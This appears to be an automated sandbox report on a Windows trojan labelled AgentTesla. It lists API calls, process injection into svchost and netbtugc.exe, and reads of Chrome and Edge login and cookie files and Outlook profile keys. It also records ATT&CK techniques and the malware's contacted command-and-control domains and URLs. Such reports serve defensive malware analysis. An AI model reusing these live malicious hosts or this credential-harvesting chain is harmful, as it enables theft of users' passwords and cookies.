            Source: Document 151-512024.exe, dZxfFeGGZbzJaFRaN.exe, 00000009.00000000.1295470303.0000000000C11000.00000002.00000001.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 00000009.00000002.3689959643.0000000000C10000.00000002.00000001.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3689853702.0000000000E10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: dZxfFeGGZbzJaFRaN.exe, 00000009.00000000.1295470303.0000000000C11000.00000002.00000001.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 00000009.00000002.3689959643.0000000000C10000.00000002.00000001.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3689853702.0000000000E10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: dZxfFeGGZbzJaFRaN.exe, 00000009.00000000.1295470303.0000000000C11000.00000002.00000001.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 00000009.00000002.3689959643.0000000000C10000.00000002.00000001.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3689853702.0000000000E10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Manager
            Source: dZxfFeGGZbzJaFRaN.exe, 00000009.00000000.1295470303.0000000000C11000.00000002.00000001.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 00000009.00000002.3689959643.0000000000C10000.00000002.00000001.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3689853702.0000000000E10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_00960698 cpuid 0_2_00960698
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009B8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_009B8195
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_0099D27A GetUserNameW,0_2_0099D27A
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_0097B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_0097B952
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_009442DE

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1392971539.0000000003190000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3688668535.0000000002E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3686290568.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3688949432.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1392632147.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3690392371.0000000003620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1393386838.0000000004E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: Document 151-512024.exeBinary or memory string: WIN_81
            Source: Document 151-512024.exeBinary or memory string: WIN_XP
            Source: Document 151-512024.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: Document 151-512024.exeBinary or memory string: WIN_XPe
            Source: Document 151-512024.exeBinary or memory string: WIN_VISTA
            Source: Document 151-512024.exeBinary or memory string: WIN_7
            Source: Document 151-512024.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1392971539.0000000003190000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3688668535.0000000002E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3686290568.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3688949432.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1392632147.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3690392371.0000000003620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1393386838.0000000004E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009C1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_009C1204
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009C1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_009C1806
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts
            1
            Native API
            1
            DLL Side-Loading
            1
            Exploitation for Privilege Escalation
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services1
            Archive Collected Data
            4
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts
            1
            Abuse Elevation Control Mechanism
            1
            Deobfuscate/Decode Files or Information
            21
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            1
            Abuse Elevation Control Mechanism
            Security Account Manager2
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts
            3
            Obfuscated Files or Information
            NTDS16
            System Information Discovery
            Distributed Component Object Model21
            Input Capture
            4
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation
            1
            DLL Side-Loading
            LSA Secrets141
            Security Software Discovery
            SSH3
            Clipboard Data
            Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection
            2
            Valid Accounts
            Cached Domain Credentials12
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Virtualization/Sandbox Evasion
            DCSync3
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation
            Proc Filesystem11
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1438042 Sample: Document 151-512024.exe Startdate: 08/05/2024 Architecture: WINDOWS Score: 100 28 www.joyesi.xyz 2->28 30 www.magmadokum.com 2->30 32 16 other IPs or domains 2->32 42 Malicious sample detected (through community Yara rule) 2->42 44 Antivirus detection for URL or domain 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 5 other signatures 2->50 10 Document 151-512024.exe 4 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 dZxfFeGGZbzJaFRaN.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 netbtugc.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 2 other signatures 19->58 22 dZxfFeGGZbzJaFRaN.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.joyesi.xyz 185.237.107.49, 80 UA-WEECOMI-ASUA Ukraine 22->34 36 www.rssnewscast.com 91.195.240.94, 49728, 49729, 49730 SEDO-ASDE Germany 22->36 38 10 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Document 151-512024.exe63%ReversingLabsWin32.Trojan.AgentTesla
            Document 151-512024.exe61%VirustotalBrowse
            Document 151-512024.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://www.antonio-vivaldi.mobi/fo8o/0%Avira URL Cloudsafe
            http://www.kasegitai.tokyo/fo8o/?FBEd=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8trWN3l8ixOWtQL9yeTsuNSglH2B9sA==&4h8=YPQX8Tch100%Avira URL Cloudmalware
            http://www.empowermedeco.com100%Avira URL Cloudmalware
            https://musee.mobi/vivaldi/fo8o/?FBEd=PTl5gU/3CD/Xhg5Nd1HWi&#43;eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHA0%Avira URL Cloudsafe
            http://www.elettrosistemista.zip/fo8o/100%Avira URL Cloudmalware
            http://www.donnavariedades.com/fo8o/?FBEd=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pDU2kX3sntZxTqRpQa59jNJPZojQ7fw==&4h8=YPQX8Tch0%Avira URL Cloudsafe
            https://www.goldenjade-travel.com/fo8o/?4h8=YPQX8Tch&amp;FBEd=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLta0%Avira URL Cloudsafe
            https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark0%Avira URL Cloudsafe
            http://www.empowermedeco.com/fo8o/100%Avira URL Cloudmalware
            https://www.goldenjade-travel.com/fo8o/?4h8=YPQX8Tch&FBEd=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ0%Avira URL Cloudsafe
            http://www.rssnewscast.com/fo8o/0%Avira URL Cloudsafe
            http://www.kasegitai.tokyo/fo8o/100%Avira URL Cloudmalware
            http://www.660danm.top/fo8o/100%Avira URL Cloudmalware
            https://musee.mobi/vivaldi/fo8o/?FBEd=PTl5gU/3CD/Xhg5Nd1HWi0%Avira URL Cloudsafe
            https://donnavariedades.com/fo8o?FBEd=l0%Avira URL Cloudsafe
            http://www.elettrosistemista.zip/fo8o/?4h8=YPQX8Tch&FBEd=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNnVmQq+khzPxid8+dZ7ofOMdeDHH5A==100%Avira URL Cloudmalware
            http://www.magmadokum.com/fo8o/?4h8=YPQX8Tch&FBEd=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMRwjYf1n6/EmRSSw2BgpSj1BbNsbEQ==100%Avira URL Cloudmalware
            http://www.goldenjade-travel.com/fo8o/?4h8=YPQX8Tch&FBEd=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwnciuyQsy8w1cq+9C58fB3trEND4VQ==0%Avira URL Cloudsafe
            http://www.magmadokum.com/fo8o/100%Avira URL Cloudmalware
            http://www.donnavariedades.com/fo8o/0%Avira URL Cloudsafe
            http://www.empowermedeco.com/fo8o/?FBEd=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZVFf0Y/DWu0uYrbCSDy6fTugJKp8nA==&4h8=YPQX8Tch100%Avira URL Cloudmalware
            http://www.3xfootball.com/fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q==0%Avira URL Cloudsafe
            http://www.rssnewscast.com/fo8o/?FBEd=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo8oWpH62KBeZ0RVxT0MiM3+/B0IJ8Q==&4h8=YPQX8Tch0%Avira URL Cloudsafe
            http://www.660danm.top/fo8o/?4h8=YPQX8Tch&FBEd=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrIKb5dMy/A4l/RoFCElkJ//A4REmieQ==100%Avira URL Cloudmalware
            http://www.goldenjade-travel.com/fo8o/0%Avira URL Cloudsafe
            https://www.empowermedeco.com/fo8o/?FBEd=mxnR100%Avira URL Cloudmalware
            http://www.antonio-vivaldi.mobi/fo8o/?FBEd=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZbzJQ+JklL0Sj0639iiSTIgkj8wGO6A==&4h8=YPQX8Tch0%Avira URL Cloudsafe
            http://www.techchains.info/fo8o/100%Avira URL Cloudphishing
            NameIPActiveMaliciousAntivirus DetectionReputation
            elettrosistemista.zip
            195.110.124.133
            truefalse
              unknown
              www.660danm.top
              34.111.148.214
              truefalse
                unknown
                empowermedeco.com
                217.196.55.202
                truefalse
                  unknown
                  www.3xfootball.com
                  154.215.72.110
                  truefalse
                    unknown
                    www.antonio-vivaldi.mobi
                    46.30.213.191
                    truefalse
                      unknown
                      www.joyesi.xyz
                      185.237.107.49
                      truetrue
                        unknown
                        www.goldenjade-travel.com
                        116.50.37.244
                        truefalse
                          unknown
                          www.rssnewscast.com
                          91.195.240.94
                          truefalse
                            unknown
                            www.techchains.info
                            66.29.149.46
                            truefalse
                              unknown
                              shops.myshopify.com
                              23.227.38.74
                              truefalse
                                unknown
                                natroredirect.natrocdn.com
                                85.159.66.93
                                truefalse
                                  unknown
                                  www.kasegitai.tokyo
                                  202.172.28.202
                                  truefalse
                                    unknown
                                    www.magmadokum.com
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.donnavariedades.com
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.liangyuen528.com
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.empowermedeco.com
                                          unknown
                                          unknowntrue
                                            unknown
                                            www.elettrosistemista.zip
                                            unknown
                                            unknowntrue
                                              unknown
                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.empowermedeco.com/fo8o/false
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://www.donnavariedades.com/fo8o/?FBEd=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pDU2kX3sntZxTqRpQa59jNJPZojQ7fw==&4h8=YPQX8Tchfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.antonio-vivaldi.mobi/fo8o/false
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.kasegitai.tokyo/fo8o/?FBEd=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8trWN3l8ixOWtQL9yeTsuNSglH2B9sA==&4h8=YPQX8Tchfalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://www.elettrosistemista.zip/fo8o/false
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://www.660danm.top/fo8o/false
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://www.donnavariedades.com/fo8o/false
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.magmadokum.com/fo8o/false
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://www.goldenjade-travel.com/fo8o/?4h8=YPQX8Tch&FBEd=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwnciuyQsy8w1cq+9C58fB3trEND4VQ==false
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.rssnewscast.com/fo8o/false
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.elettrosistemista.zip/fo8o/?4h8=YPQX8Tch&FBEd=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNnVmQq+khzPxid8+dZ7ofOMdeDHH5A==false
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://www.magmadokum.com/fo8o/?4h8=YPQX8Tch&FBEd=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMRwjYf1n6/EmRSSw2BgpSj1BbNsbEQ==false
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://www.kasegitai.tokyo/fo8o/false
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://www.rssnewscast.com/fo8o/?FBEd=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo8oWpH62KBeZ0RVxT0MiM3+/B0IJ8Q==&4h8=YPQX8Tchfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.empowermedeco.com/fo8o/?FBEd=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZVFf0Y/DWu0uYrbCSDy6fTugJKp8nA==&4h8=YPQX8Tchfalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://www.660danm.top/fo8o/?4h8=YPQX8Tch&FBEd=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrIKb5dMy/A4l/RoFCElkJ//A4REmieQ==false
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://www.3xfootball.com/fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q==false
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.antonio-vivaldi.mobi/fo8o/?FBEd=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZbzJQ+JklL0Sj0639iiSTIgkj8wGO6A==&4h8=YPQX8Tchfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.goldenjade-travel.com/fo8o/false
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.techchains.info/fo8o/false
                                              • Avira URL Cloud: phishing
                                              unknown
                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://duckduckgo.com/chrome_newtabnetbtugc.exe, 0000000A.00000002.3694681705.0000000007E0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://download.quark.cn/download/quarkpc?platform=android&ch=pcquarknetbtugc.exe, 0000000A.00000002.3692885046.0000000004D88000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3694569550.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003AE8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.jsnetbtugc.exe, 0000000A.00000002.3692885046.0000000004D88000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3694569550.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003AE8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  high
                                                  https://duckduckgo.com/ac/?q=netbtugc.exe, 0000000A.00000002.3694681705.0000000007E0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.jsnetbtugc.exe, 0000000A.00000002.3692885046.0000000004D88000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3694569550.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003AE8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      high
                                                      https://musee.mobi/vivaldi/fo8o/?FBEd=PTl5gU/3CD/Xhg5Nd1HWi&#43;eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAnetbtugc.exe, 0000000A.00000002.3692885046.000000000428A000.00000004.10000000.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000002FEA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.goldenjade-travel.com/fo8o/?4h8=YPQX8Tch&FBEd=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJnetbtugc.exe, 0000000A.00000002.3692885046.00000000040F8000.00000004.10000000.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000002E58000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://track.uc.cn/collectnetbtugc.exe, 0000000A.00000002.3692885046.0000000004D88000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3694569550.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003AE8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        high
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=netbtugc.exe, 0000000A.00000002.3694681705.0000000007E0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=netbtugc.exe, 0000000A.00000002.3694681705.0000000007E0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.goldenjade-travel.com/fo8o/?4h8=YPQX8Tch&amp;FBEd=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtanetbtugc.exe, 0000000A.00000002.3692885046.00000000040F8000.00000004.10000000.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000002E58000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.empowermedeco.comdZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3692339141.0000000004BCF000.00000040.80000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://www.ecosia.org/newtab/netbtugc.exe, 0000000A.00000002.3694681705.0000000007E0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_netbtugc.exe, 0000000A.00000002.3692885046.00000000045AE000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3694569550.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.000000000330E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                high
